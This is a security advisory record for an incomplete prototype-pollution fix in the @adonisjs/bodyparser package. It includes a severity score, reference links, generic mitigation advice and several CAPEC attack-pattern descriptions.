  "id": "GHSA-qcm7-3vpr-hj5h",
  "modified": "2026-06-30T18:34:32Z",
  "published": "2026-06-30T18:34:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/adonisjs/core/security/advisories/GHSA-f5x2-vj4h-vg4c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/adonisjs/core/security/advisories/GHSA-qcm7-3vpr-hj5h"
    },
    {
      "type": "WEB",
      "url": "https://github.com/adonisjs/bodyparser/commit/40e1c71f958cffb74f6b91bed6630dca979062ed"
    },
    {
      "type": "WEB",
      "url": "https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/adonisjs/core"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@adonisjs/bodyparser has an incomplete fix for CVE-2026-25754"
}

Mitigation
Implementation

By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.

Mitigation
Architecture and Design

By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.

Mitigation
Implementation

Strategy: Input Validation

When handling untrusted objects, validating using a schema can be used.

Mitigation
Implementation

By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.

Mitigation
Implementation

Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.

CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs

In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.

CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels

An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.